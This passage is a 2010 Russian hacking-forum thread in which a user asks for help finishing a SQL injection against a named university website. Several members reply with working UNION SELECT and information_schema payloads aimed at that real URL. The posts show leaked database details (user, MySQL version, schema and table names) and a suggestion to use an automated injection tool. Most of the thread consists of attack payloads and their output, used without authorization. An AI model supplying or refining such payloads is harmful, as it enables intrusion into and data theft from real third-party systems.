Помогите закончить иньекцию умоляю!
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Помогите закончить иньекцию умоляю! - 2010-09-13 04:34:05.360000
|
|
|
xenon1987
Сообщений: 3
Оценки: 0
Присоединился: 2007-11-03 11:10:00.260000
|
Вот что то ломал сайт универа нихера не получается!
http://ufdvgu.ru/events/news/show/?id=1+union+select+null,null,VERSION(),null,null/*
Вот нашел еоличество столбцов и тот где выводиться информация!
|
|
|
|
|
RE: Помогите закончить иньекцию умоляю! - 2010-09-13 06:08:34.400000
|
|
|
yMa.hacKer
Сообщений: -1779
Оценки: 10
Присоединился: 2010-01-10 14:25:47.293333
|
http://forum.xakep.ru/m_1507291/tm.htm - урок номер два.
|
|
|
|
|
RE: Помогите закончить иньекцию умоляю! - 2010-09-13 08:37:40.180000
|
|
|
xenon1987
Сообщений: 3
Оценки: 0
Присоединился: 2007-11-03 11:10:00.260000
|
http://ufdvgu.ru/events/news/show/?id=1+union+select+1,2,3,4,5
НУ вот я нашел что тройка выводиться достал следующие данные
ufdvgu_user@localhost
5.0.44-log
ufdvgu
А вот это сделать не получается подскажите пожалуйста
http://ufdvgu.ru/events/news/show/?id=1+union+select+1,2,schema_name+FROM+information_schema.schemata+LIMIT+0,1,4,5
Пишит якобы
Ошибка при выполнении запроса к базе данных!
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '4,5' at line 1
http://ufdvgu.ru/events/news/show/?id=1+union+select+1,2,table_name,4,5+FROM+information_schema.tables
и вот это показывает
CHARACTER_SETS
|
|
|
|
|
RE: Помогите закончить иньекцию умоляю! - 2010-09-13 10:31:50.306666
|
|
|
yMa.hacKer
Сообщений: -1779
Оценки: 10
Присоединился: 2010-01-10 14:25:47.293333
|
quote:
А вот это сделать не получается подскажите пожалуйста
http://ufdvgu.ru/events/news/show/?id=1+union+select+1,2,schema_name+FROM+information_schema.schemata+LIMIT+0,1,4,5
хоть я и сам не очень в них разбираюсь, но думаю, что должно быть так:
http://ufdvgu.ru/events/news/show/?id=1+union+select+1,2,schema_name,4,5+FROM+information_schema.schemata+LIMIT+0,1
|
|
|
|
|
RE: Помогите закончить иньекцию умоляю! - 2010-09-13 16:39:42.253333
|
|
|
toshibaaa
Сообщений: 6
Оценки: 0
Присоединился: 2010-06-07 14:52:01.196666
|
http://ufdvgu.ru/events/news/show/?id=1+union+select+1,2,group_concat%28table_name+separator+0x3a%29,4,5+from+information_schema.tables+where+table_schema=0x756664766775--
|
|
|
|
|
RE: Помогите закончить иньекцию умоляю! - 2010-09-14 01:59:50.990000
|
|
|
xenon1987
Сообщений: 3
Оценки: 0
Присоединился: 2007-11-03 11:10:00.260000
|
А что дальше делать подскажите пожалуйста ничего не выходит я тупица может быть?
|
|
|
|
|
RE: Помогите закончить иньекцию умоляю! - 2010-09-15 21:50:21.006666
|
|
|
redmin123
Сообщений: 61
Оценки: 0
Присоединился: 2010-08-26 12:40:27.260000
|
На этом сайте интересного ничего НЕТ! Если ты не умеешь крутить скули то юзай SQL Helper;
|
|
|
|
|
RE: Помогите закончить иньекцию умоляю! - 2010-12-29 21:33:57.270000
|
|
|
scav
Сообщений: 5
Оценки: 0
Присоединился: 2010-12-29 21:25:57.723333
|
честно - там ничего нет интересного. Даже админка, как таковая, там отсутствует. По крайней мере таблиц с юзерами я не нашел, хотя, судя по тому,что нет формы логина - это не удивительно.
|
|
|
|
|
|
